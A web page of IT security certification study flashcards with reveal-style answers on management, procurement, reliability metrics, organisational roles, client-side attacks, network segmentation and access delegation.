Historic: A historic RFC is one that has been rendered obsolete by an updated version, makes record of a protocol that is not considered interesting in the current Internet, or has been removed from the standards track for miscellaneous reasons. Some obsolete RFCs are not categorized as historic because the Internet standards process generally does not allow standardized references from a standards track RFC to another RFC with lower status., Unknown: Status unknown is used for some very outdated RFCs, where it is unknown which status would be applied to a given document if it were published today. Some of these RFCs wouldn’t be published at all; an early RFC was often just that: a simple request for comments, not intended to define a protocol, administrative procedure, or anything else for which the RFC series is used today. The International Organization for Standardization, commonly known as ISO, is an international-standard-setting body that’s made up of representatives from various national standards organizations. Founded on 23 February 1947, the organization declares worldwide proprietary industrial and commercial standards. The ISO is headquartered in Geneva, Switzerland. Though the organization has described itself as “non-governmental” it can apply standards that often are established as law, either through treaties or national standards, adorning it with more power than most non-governmental organizations. In practice, ISO acts as a consortium with substantial connections to governments.
What is Situational Awareness?
Describe situational awareness and its importance in management and risk.
Situational awareness is an observation of environmental components pertaining to time and/or space, cognizance of their meaning, and the evaluation of their status after some variable has changed, such as time. Situational awareness is a…
Show answer and Breakdown
Answer:
Tool used to enhance awareness of what is happening in the vicinity, and to comprehend how information, events, and one’s personal actions will affect goals and objectives, both presently and long-term. Having complete, accurate and updated situational awareness is very important when the technological and circumstantial complexity of the human decision-maker is a concern.
What are Client-Side Attacks?
Describe the nature of a client-side attack and provide a modern example.
Attacks targeted at individual client computers are called client-side attacks. These are usually directed at web browsers and instant-messaging applications. Since most organizations invest resources…
Show answer and Breakdown
Answer:
in defending against server-side attacks, and client systems aren’t commonly fortified like server systems are, client-side attacks are easier targets with increased chance of succeeding. Cross-site scripting (XSS) is a form of a client side attack, where the culprit injects client-side script into Web pages viewed by other users. Web browser security is intended to block the running of a script on one site when a user is visiting another site. Unfortunately, flaws allow specially programmed web pages to bypass such security. Such cross-site scripting grants an attacker access to data from other sites (such as logon information), to inject data into forms, and to instruct the browser to download and install content as if it originated from the trusted site rather than from the corrupted site. Filtering data entered by users is the main technique to block XSS attacks. Administrators must remove or disable script tags and other “actionable” contents that could request remote scripts.
What are Threats?
Describe a threat.
A threat is an act of intimidation wherein an act is proposed to trigger a negative response. It communicates hostile…
Show answer and Breakdown
Answer:
intent to cause harm or loss to an individual. In many jurisdictions, threats are considered crimes under certain circumstances. Threat (intimidation) is commonly used in the animal kingdom, often in the form of ritual.
What is Global Information Architecture?
Describe Global Information Architecture (Global IA).
Global Information Architecture is needed to define the major information categories used within an enterprise and their relationships to business operations. It is vital for guiding…
Show answer and Breakdown
Answer:
applications development and handling the integration and sharing of data. Information architecture is associated with other infrastructure issues as well as software development and data resources. An infrastructure cannot be effective if data is dispersed throughout the network without a plan. Likewise, software cannot integrate across functions nor distribute across networks without a clear plan. Information architecture offers a method to coordinate these activities. Global information architecture is used for defining the major information categories used within an enterprise and their relationships to business operations. If global information architecture is not implemented in any business, the business is susceptible to various kinds of attackers.
What is a Request for Proposal (RFP)?
What is a Request for Proposal (RFP)?
A request for proposal (RFP) is a procurement document that requests solutions, ideas, and detailed information from the vendor about the outsourced function. The vendor supplies a proposal in response to the RFP. An RFP is typically submitted with a declaration of work that specifies the outsourcing need the vendor will provide with a solution and a price. A request for proposal (RFP) is…
Show answer and Breakdown
Answer:
a document used to seek out proposals from prospective sellers which entail a significant amount of negotiation. Case example: an agency wants to automate its work practices; it issues an RFP so prospective sellers can respond with proposals. Sellers might propose various hardware, software, and networking solutions to align with the agency’s needs. Writing a solid RFP is an important part of procurement planning and can offer invaluable expertise. Legal requirements are often involved in issuing RFPs and reviewing proposals, particularly for government projects. It might be especially useful to confer with experts familiar with procurement planning. To make sure the RFP contains the required information to provide the basis for a good proposal, the buying organization should ask these questions: Can the seller develop a good proposal based on the information in the RFP? Can the seller determine detailed pricing and schedule information based on the RFP?
What is a Request for Quote (RFQ)?
What is a Request for Quote (RFQ)?
A request for quote (RFQ) is a procurement document that you (the buyer) submits to the vendor. The RFQ requests a price from the vendor for the specified work, product, or service. As opposed to an RFP, an RFQ is a document used to draw quotes or bids, that require little negotiation, from…
Show answer and Breakdown
Answer:
prospective sellers for commodity products. Case example: the government wants to purchase 100 personal computers with specific features; it submits an RFQ to potential sellers. RFQs don’t require as much time to prepare as RFPs, nor does the process of soliciting responses. All procurement documents must be written to yield accurate and complete responses from prospective sellers. They should include background information about the entity and the stated project, the associated statement of work, a schedule, a description of the desired form of response, evaluation criteria, pricing forms, and any required contractual provisions. They should also be detailed enough to assure consistent, comparable responses, but with some flexibility to allow consideration of seller suggestions for enhanced methods to meet the requirements.
What is a Request for Information (RFI)?
Describe a Request for Information (RFI).
A request for information (RFI) is a document used to solicit information about prospective sellers well in advance of an RFP or RFQ is issued. A buyer uses…
Show answer and Breakdown
Answer:
an RFI in order to examine the landscape of sellers that could potentially bid at a future juncture. An RFI typically precedes an RFP or RFQ by several months.
What is an Agreement?
What is an agreement?
An agreement is an understanding or meeting of minds between two or more legally competent parties, about their respective duties and rights regarding current or future performance. When people share a viewpoint or…
Show answer and Breakdown
Answer:
notion about something, they agree. Sometimes it is prudent to include a written statement about what has been agreed upon. This is an agreement. Agreements are common in law and business. For example, when a person hires someone to perform a scope of work, an agreement is usually signed so everyone is clear about what must be done and within what time frame.
What is Benchmarking?
What is benchmarking / best practice benchmarking / process benchmarking?
Benchmarking is also acknowledged as Best Practice Benchmarking or Process Benchmarking. It is a method used in management and especially useful in strategic management. It is the process of comparing the business methods and performance metrics including cost, cycle time, productivity, or quality to another that is commonly understood to be an industry standard benchmark or best practice. It gives organizations…
Show answer and Breakdown
Answer:
insight when developing plans of best practice and its application with the goal of enhancing some of performance. Benchmarking might be a one-time instance though it is commonly regarded as an ongoing process in which organizations continually seek out to challenge their practices. It allows organizations to develop plans on improving or adapting specific best practices, usually with the goal of enhancing some aspect of performance.
Why to Use Prototypes and Testing
Why do organizations use prototyping?
The following are purposes for creating a prototype or using a multiple test environment:
Show answer and Breakdown
Answer:
It reduces initial project risks within a business organization. It helps verify some of the application requirements that are not clearly defined by a user. It confirms technology recommendations for an application. It reduces the gap between what a developer has defined for application architecture and what business management has understood. It also reduces the gap between what a user has defined for an application requirement or scenario and what a developer has defined in the application development.
Cost Benefit Analysis and How to Perform One
What is Cost Benefit Analysis and what is the process involved in performing one?
Cost-benefit analysis is a process by which business decisions are examined. It is used to calculate and total up the equivalent money value of the benefits and costs to the community of projects to determine if they are worthy pursuits. Cost benefit analysis refers both to: Helping to appraise, or assess, the case for a project, program, or policy proposal; An approach to making economic decisions of any kind. Under both definitions, the process involves, either overtly or implicitly, weighing the total anticipated costs against the total expected benefits of one or more actions in order to narrow down the best or most profitable option. The formal process is often referred to as either CBA (Cost-Benefit Analysis) or BCA (Benefit-Cost Analysis). Here are the steps involved in a generic cost-benefit analysis process:
Show answer and Breakdown
Answer:
Establish alternative projects/programs Compile a list of key players Select measurement and collect all cost and benefits elements Predict outcome of cost and benefits over the duration of the project Put all effects of costs and benefits in dollars Apply discount rate Calculate net present value of project options Sensitivity analysis Recommendation
What is Return on Investment?
Define Return on Investment.
Return on Investment or ROI is a value that aids the process of capital investment decisions. It is calculated by dividing the annual benefit by the…
Show answer and Breakdown
Answer:
investment amount. The result of the formula of ROI should be unreliable to accurately measure success or corporate value, since the value of the asset is not a reliable indicator of actual worth.
What is the Total Cost of Ownership (TCO)?
What is the Total Cost of Ownership (TCO)?
The total cost of ownership (TCO) is a financial estimate specialized to help consumers and enterprise managers evaluate direct and indirect costs. Many organizations use…
Show answer and Breakdown
Answer:
TCO as it offers a statement on the financial impact of deploying information technology during its whole life-cycle.
What is Proactive Cyber Defense?
Define proactive cyber defense.
Proactive Cyber Defense is defined as acting in anticipation to defend from an attack against computers and networks. Proactive cyber defense often requires…
Show answer and Breakdown
Answer:
additional security from Internet service providers. Part of the motivation for proactive defense strategy is cost and choice. Making choices after an incident of attack are challenging and costly. Proactive defense helps mitigate operational risk.
Review the Effectiveness of Your Existing Security
Security effectiveness review.
Reviewing the effectiveness of existing security helps to…
Show answer and Breakdown
Answer:
preserve the safety and security of assets of the organization. It indicates that the current security system is helpful to secure the network or not.
What is Reverse Engineering?
What is reverse engineering?
Reverse engineering is a process of learning the technological principles of a device, object, or system through evaluation of…
Show answer and Breakdown
Answer:
its structure, function, and operation. It often involves dissecting an element and analyzing its workings in detail to be used in maintenance or to attempt to produce a new device or program that does the same thing without using or simply duplicating the original.
Performing a Security Solutions Analysis
When performing a security solutions analysis on your organization’s existing platforms and applications, what steps should you follow?
By using the following security solutions, you can ensure that they meet all business needs Specify the performance: When implementing security solutions, a user must ensure that the security solutions support all business needs. Latency: Latency helps to assess time delay experienced in a system, the precise estimation of which depends on the system and the time being measured. Capability: Capability-based security aids in the development of secure computing systems. A capability (defined in some systems as a key) is a communicable, unforgeable token of authority. It pertains to a value that references an object along with an associated set of access rights. Usability: Usability testing helps to evaluate an application by testing it on users. This can be regarded as an exceptional usability practice, as it supports direct inputs on how real users use the system. Usability testing focuses on evaluating an application’s capacity to meet its intentions. Examples of products that are strengthened from usability testing are Web sites, Web applications, computer interfaces, documents, devices, etc. Usability testing evaluates the usability or ease of use of a specific object or group of objects. Maintainability: The capability to correct flows in the existing functionality without compromising other components of the system. Scalability: Scalability testing helps in testing of a software application for evaluating its potential to scale up or scale out based on any of its non-functional capabilities, such as the user load supported, the number of transactions, the data volume, etc. It is a test purposed to make certain both functionality and performance of the system will scale up to meet specified requirements. This activity of non-functional software testing is often referred to as load/endurance testing. Performance, scalability, and reliability are considered together by software quality analysts. Scalability is the ability of a system, network, or process, which handles an increasing amount of work in a capable regular method or its ability to be enlarged to hold that growth. Scalability can be calculated in a range of ways, including: click for more…
Show answer and Breakdown
Answer:
– Administrative scalability: This type is used for expanding the number of organizations to share and enlarge a single distributed system. – Functional scalability: This variant of scalability is used to enhance the system by implementing new functionality at least effort. – Geographic scalability: This type of scalability is used to support the performance, usability. – Load scalability: This type is for distributed systems to expand and contract its resource pool to hold heavier loads.
What is Mean Time to Repair (MTTR)?
What is Mean Time To Repair (MTTR)?
Mean Time To Repair (MTTR) is the standard amount of time needed to repair a Configuration Item or IT Service after a failure. It reflects the average time required to…
Show answer and Breakdown
Answer:
fix a failed component or device. Broken down mathematically, it is the total corrective maintenance time divided by the total number of corrective maintenance actions performed within a given period of time. This does not include lead time for parts not immediately available or other Administrative or Logistic Downtime (ALDT).
What is Mean Time Between Failures (MTBF)?
Define Mean Time Between Failures (MTBF). Then let's look into the topic a bit further.
Mean Time Between Failures (MTBF) is the pre-calculated elapsed time between inherent failures of a system during operation. MTBF can be estimated as…
Show answer and Breakdown
Answer:
the arithmetic mean time between failures of a system. MTBF is customarily part of a model that regards the failed system is immediately repaired, as a part of a regenerative process. This differs from the Mean Time To Failure (MTTF), which calculates average time between failure with the modeling assumption that the failed system is not repaired. For each observation, downtime is the exact time it went down, which is after (i.e. greater than) the moment it went up, uptime. The difference between downtime and uptime is the duration of time it was operating between these two events. MTBF value prediction is an important component in the development of products. Reliability engineers/design engineers, often utilize Reliability Software to estimate products’ MTBF in accordance with various methods/standards. However, these “prediction” methods are not meant to reflect fielded MTBF as is often believed. The intent of these tools is to concentrate design efforts on the weak links in the design. Common MTBF Misconceptions: MTBF is often confused with a component’s useful life, despite the fact these concepts are not related in any way. For example, a battery may have an effective life of five hours, and an MTBF of 100,000 hours. These figures speculate that in a population of 100,000 batteries, there will be approximately one battery failure every hour during a single battery’s five-hour lifespan. Another common misconception about the MTBF is that it defines the average time when the probability of failure equals the probability of not having a failure (i.e. a reliability of 50%). This is accurate only for certain symmetric distributions. In many instances, such as the (non-symmetric) exponential distribution, this is not the case. In particular, for an exponential failure distribution, the probability that an item will fail at or before the MTBF is approximately 0.63 (i.e. the reliability at the MTBF is 37%). For typical distributions with some differences, MTBF only represents a top-level aggregate statistic, and is therefore not effective in predicting specific time to failure, the uncertainty arising from the variability in the time-to-failure distribution. Another misconception is to expect that the MTBF value is higher in a system that uses component redundancy. Component redundancy can elevate the system MTBF; however, it will decrease the hardware MTBF, since the higher the number of components in a system, the more often a hardware component will undergo failure, leading to a decrease in the system’s hardware MTBF. Variations of MTBF: There are several forms of MTBF, such as mean time between system aborts (MTBSA) or mean time between critical failures (MTBCF) or mean time between unit replacement (MTBUR).
What is Emergency Management?
Define the concept of Emergency Management.
Emergency Management Emergency management is a field that focuses on strategic organizational management processes. It’s used to safeguard the critical assets of an organization from hazard risks brought by disasters or catastrophes, and to maintain…
Show answer and Breakdown
Answer:
their efficiency within their planned lifetime. Successful emergency management is based on the strategic combination of emergency plans at all stages in the organization. It also outlines the understanding that the lower levels of the organization have responsibility in managing emergencies and getting additional resources and assistance from the upper levels. Emergency management is a tactic concerned with the strategic organizational management processes. It is applied to preserve the critical assets of an organization from hazard risks introduced by disasters or catastrophes, and to ensure their efficiency within their planned lifetime.
Conduct a Lessons Learned / After Action Review (AAR)
What is a Lessons Learned review and an After Action Review (AAR)?
Conduct a lessons-learned/after-action review Lessons learned is the process used to glean knowledge from experience to be applied to current and future processes to deter repeat occurrences of past failures and mishaps. The ultimate objective is to…
Show answer and Breakdown
Answer:
turn any deficiencies and recognized best practices into lessons learned in order to enhance effectiveness. Lesson learned systems are motivated by the need to crystallize knowledge and convert individual experience into a broader, documented knowledge so that those who encounter a similar context or condition may benefit from applying a lesson learned. An after action review (AAR) is a structured review process to examine what happened, why it happened, and how it can be improved by the participants and those responsible for the project or event. It occurs within the duration of defining the leader’s intent, planning, preparation, action, and review.
What is Guidance of Expert Judgement?
Define “Expert Judgement” and how it aids in difficult decision making.
When working on a project, certain problems will arise that haven’t been applied with a best solution. For these issues, you can apply guidance of expert judgment, which is a technique…
Show answer and Breakdown
Answer:
based on a set of criteria that has been acquired in a specific knowledge area or product area. Expert judgment is implemented when the project manager or team member needs specialized knowledge they don’t possess. Expert judgment involves people with advanced knowledge of the work of creating estimates. Ideally the team member who’s responsible for this task should complete the estimates. Expert judgment is used when performing administrative closure tasks and experts should make sure the project or phase closure is done to the appropriate standards.
Integrating Security Across Disciplines
Security principles take different shapes and forms across the various different disciplines in the organization. What do some of those look like?
Interpreting security requirements and goals to communicate with other disciplines In many systems and organizations employees perform their jobs as individuals but they also work as members. It’s important to be mindful of the situation awareness of not just individual team members, but also the situation awareness of the organization as a…
Show answer and Breakdown
Answer:
whole. In order to attain a secure solution for the organization, everyone must follow the proper protocols of communication with other disciplines. Programmers Normally, a programmer is responsible for writing programs to meet specific requirements of clients, but in the security era, a programmer is tasked with creating a specialized program to elevate network security. Network engineers A network engineer is responsible for designing and managing computer networks. The network engineer focuses on the overall integrity of the network, security, and making certain network connectivity throughout a company’s LAN/WAN infrastructure is up to date with technical considerations at the network level of an organization’s hierarchy. Sales staff The duties and responsibilities of the salesperson can differ according to the nature of the business. A salesperson should be equipped with knowledge about the product so they can effectively communicate with customers. The salesperson should be able to sell a product with the right amount of persuasion and it is that person’s responsibility to address customer concerns and satisfy their interests when they’re considering a product. The salesperson should also handle and maintain monetary transactions. A salesperson is also responsible for greeting customers; to help them identify their requirements; to promote products; to answer any questions the customer has about the product; to negotiate the price; to arrange the merchandise properly; and to oversee the ordering of the supplies.
Understand the Disciplines and Functional Areas in Your Organization
In order to properly plan the security policies across the organization, a security manager must thoroughly know the roles that each discipline and functional area plays in their company.
Programmer A programmer writes, tests, debugs, and manages the specified instructions in computer programs that computers follow to execute their functions. The programmer also conceives, designs, and tests logical structures in order to resolve computer issues. Numerous technical innovations in programming, advanced computing technologies, and sophisticated programming languages and tools have restructured the role of a programmer in an organization. Database administrator A database administrator develops and designs database strategies; oversees and enhances database performance and capacity; anticipates and plans for future expansion requirements. This person also plans, coordinates, and applies security measures for safety of the database. A database administrator is also referred to as database coordinator or database programmer. This role is closely related to the database analyst, database modeler, programmer analyst, and systems manager.
The activities performed by a database administrator:
Transferring Data Replicating Data Maintaining database and ensuring its availability to users Maintaining the data dictionary Controlling privileges and permissions to database users Monitoring database performance. Database security Stop. Data fragmentation Give authority to access the database to the authorized person.
A database administrator should possess these skills:
Strong organizational skills Strong logical and analytical thinker Ability to concentrate and pay close attention to detail Ability to think broadly and consider impacts across systems and within the organization
Network administrator A network administrator is responsible for the maintenance of computer hardware and software associated with a computer network. He deploys, configures, maintains, and monitors active network equipment. The role of the network administrator entails the operation and configuration of the network with continuous monitoring, in addition to:
Ensure proper functioning of the network. Design and organize the system network. Assign routing procedures and configurations. Assign IP addresses to the various devices involved in the system network. Take care of system settings and printer settings. Debug issues related to the network. Set up standard installation packages for all the systems to ensure uniformity. Evaluate the purchase of new advanced technology devices. Ensure proper connectivity to all the end users in the organization.
Management It is the responsibility of management to make sure employees are covered in terms of finances, health care, and other economic-related issues as well as making certain that interpersonal relations and social issues such as community viability and emotional stability are healthy.
Stakeholders A stakeholder is defined as a person, group, or organization that has direct or indirect stake in an organization. Key stakeholders in a business organization include creditors, customers, directors, employees, government, owners, suppliers, unions, and the community where the business yields its resources. Various stakeholders are entitled to various considerations. For instance, the company’s customers are entitled to fair trading practices but not entitled to the same considerations as the company’s employees. Financial The roles and responsibilities of the financial department play a significant role in the smooth operation of the business. The most standard function of this department is to document and manage incoming and outgoing cash flows as well as the actual processing of the cash flows. The responsibilities of a financial department:
Budget management Grants management Salary administration Property management Purchasing Handling cash
HR The responsibilities of HR varies according to the size of the organization. HR directors, and occasionally HR managers direct several… click to read more…
Show answer and Breakdown
Answer:
departments that are led by functional or specialized HR staff such as the training manager, the compensation manager, or the recruiting manager. Human Resources personnel are advocates for both the company and employees of the company. Emergency response team The Emergency management team is made up of executives and line managers to make critical decisions at the Emergency Operations Center. This team coordinates with the managers who oversee undamaged areas of the business and makes determinations about the use of personnel necessary to support the response and recovery efforts. The leaders of each team report to the emergency management team. Facilities manager A facility manager is responsible for best application of company resources and in making a strategy for maximum allocation of space used in new contracts. This person creates a text document that includes proposals for the client or contractor. The responsibilities of a facility manager: Analyze and manage projects to give desired output in given deadlines. Plan new offers with reliability, availability. Notify all expenses in providing services and goods used in project completion and then, find out the profit earned in particular project. Make an attractive plan with the help of different business strategies. Improve current activities with minimum interruption for excellent results. Check health and security points, before approval of a building. Encourage various members of the team and maintain interaction between them. Physical security manager A physical security manager is responsible for evaluating, recommending, and directing modifications to the Corporate Security Manager to preserve the security of assets, facilities, and employees of the organization. They should have expertise with security principles and security elements. The duties and responsibilities of a physical security manager: Coordinate all physical security issues throughout the organization. Develop and implement policies, standards, guidelines and procedures related to physical security operations. Manage physical security and BSOC supervisors. Responsible for design of Security features. Responsible for development of written physical security plans for critical infrastructures. Manage the purchasing, installation, upgrading, and maintenance of all existing physical security equipment.
Explain the security impact of inter-organizational change
Explain the security impact of inter-organizational change.
When major changes are imposed on an organization, there is often resistance and displeasure. Organizational change has been proven a key issue that brings about significant challenges to an organization’s effective and timely implementation of privacy and security standards. It is important to…
Show answer and Breakdown
Answer:
identify specific implementation requirements that reflect the most pressing organizational change challenges. Organizations should be aware of processes and methods to foster acceptance of the changes associated with the entire compliance project. In this day in age of technology organizations are connected to each other through the Internet. With the accelerated growth of the world wide web, network security has become a major concern for organizations throughout the world. The fact that the information and resources needed to corrupt the security of corporate networks are widely available has deepened that concern.
Security Design Considerations During Mergers, Acquisitions and Demergers
Be familiar with security design considerations during mergers, acquisitions and demergers.
Mergers and acquisitions (M&A) deals with the aspect of corporate strategy, corporate finance, and management dealing with the buying, selling, dividing, and combining of different organizations and similar entities that can promote rapid growth for the enterprise in its sector or location of origin, or a new field or new location, without creating a subsidiary, or using a joint venture. Demerger is a type of corporate reconstruction where an entity’s business operations are separated into one or several components. It is the flip side of a merger or acquisition. A demerger can ensue through the transference of shares in a subsidiary holding the business to company shareholders carrying out the demerger. The demerger can also happen when the business is transitioned to a new company or business upon which that company’s shareholders are issued shares of. Demergers can arise for various business and non-business reasons, such as government intervention, through antitrust law or decartelization. The following components should be considered during mergers, acquisitions, and demergers: click below…
Show answer and Breakdown
Answer:
Software and hardware licenses Outsourcing agreements Transitional services agreement Penalty clauses Post-Merger Integration (PMI) costs
Assuring third party products – only introduce acceptable risk
Third party products and applications have unique security concerns from internally developed products.
Acceptable risk is an event whose likelihood of occurrence is minor and that bears modest consequence with significant benefits. In these scenarios individuals are willing to be exposed to the risk that the event might occur. The concept of acceptable risk derived partly from the understanding that guaranteed safety in every instance is an unachievable goal, and that even very low exposures to certain toxic substances may bear some level of risk. Incident detection entails the modification of performance and availability issues facing your end users and customers, with the ability to seamlessly integrate with any third-party products. A third-party product takes a noninvasive method to…
Show answer and Breakdown
Answer:
authenticating security, performance, and availability of infrastructure and applications. It requires no installation of software or components on the networks or servers where your applications reside. This lowers risks to your production systems in the network while raising the benefits of third-party service validation. Custom developed software is uniquely developed for an organization or user. It’s also referred to as bespoke software. Custom developed software can be contrasted with software packages produced for the mass market, such as commercial off-the-shelf (COTS) software, or available free software. Custom software can be produced by an in-house software development team, or be commissioned from a software house or independent software developer. Because custom software is produced for a specific customer, it can meet that customer’s particular preferences and needs. Custom software may be designed in incremental processes of phases, allowing the opportunity to identify all possible hidden dangers, including those not mentioned in the specifications. The initial step in the software development process may involve several departments, including marketing, engineering, research and development, and general management.
Commercial Off-The-Shelf Products and Their Security Challenges
Know Commercial Off-The-Shelf products and the security challenges that they present.
COTS is an acronym for Commercial Off-The-Shelf products. These products save on time and efforts in producing programs and services by purchasing them from a third-party vendor. COTS products accelerate and lower the cost of system construction, but commonly include these issues: click to view
Show answer and Breakdown
Answer:
Integration: COTS products must be integrated with existing systems. However, they may contain incompatibilities with the existing programs and services. Dependency on third-party vendors: All COTS products are available through third-party vendors. Relying on third-party vendors can create risks if the vendor goes out of business. Failure to meet individual requirements: These products may not meet the organization’s specific requirements across the board as they are designed for general use. Threats of failures: If COTS products do not produce the desired results, a project may have poor performance or result in complete failure.
Network Segmentation and Its Advantages
What is network segmentation and what are the advantages that it presents?
Network segmentation in computer networking is the process or profession of dividing a computer network into sub-networks, each being a network segment or network layer. The advantages of such splitting are mainly for elevating performance and strengthening security, as well as: click to view
Show answer and Breakdown
Answer:
Reduced congestion: Improved performance is evident because on a segmented network, there are fewer hosts per sub-network, reducing local traffic. Improved security: Broadcasts will be contained to the local network. Internal network structure will not be visible from outside. Containing network problems: It curbs the effect of local failures on other parts of the network.
Delegation at the Authentication / Identity Level
Explain the concept of delegation at the authentication or identity level.
If an authentication mechanism allows for an effective identity that has any variation from the validated identity of the user, it is labeled identity delegation at the authentication level if…
Show answer and Breakdown
Answer:
the owner of the effective identity has historically authorized the owner of the validated identity to use his identity. The current methods of identity delegation applying sudo or su commands of UNIX are very common. A delegated account password or specified authorization acceded by the system administrator is required.
Delegation at Authorization / Access Control Level
Explain the concept of Delegation at Authorization / Access Control Level.
Delegation at Authorization/Access Control Level The most practiced method of ensuring computer security is access control techniques provided by operating systems such as UNIX, Linux, Windows, Mac OS, etc. If the delegation is efficient…
Show answer and Breakdown
Answer:
configured, like Role based access control (RBAC) delegation, there is always a risk of under-delegation. In under-delegation, the delegator does not delegate all the necessary authorizations to carry out a delegated job. This may result in the denial of service, which is objectionable in some environments, especially safety critical systems. In RBAC-based delegation, one alternative to achieve delegation is the reassignment of a group of permissions to the role of a delegate. Identifying the relevant permissions for a specific job is not a simple task for large and complex systems. Additionally, when assigning these permissions to a delegate role, all other users who are associated with that same role also obtain the delegated rights. If the delegation is enacted by assigning the roles of a delegator to a chosen delegate, then it would not only be an issue of over-delegation but the added complication the delegator has to figure out what roles, in the complex hierarchy of RBAC, are required to perform a particular job. These types of challenges are not a factor in identity delegation mechanism and normally the user interface is simpler.
Basic Network Components
Which of the following is a component that provides resources over a network?
- Client
- LAN
- Router
- Server
Show answer and Breakdown
Answer: The correct answer is 4.
Breakdown: A server provides or “serves” up resources to a network. Examples of resources are access to email, pages on a web server, or files on a file server.
Answer: The correct answer is 4
Breakdown: A server provides or “serves” up resources to a network. Examples of resources are access to email, pages on a web server, or files on a file server.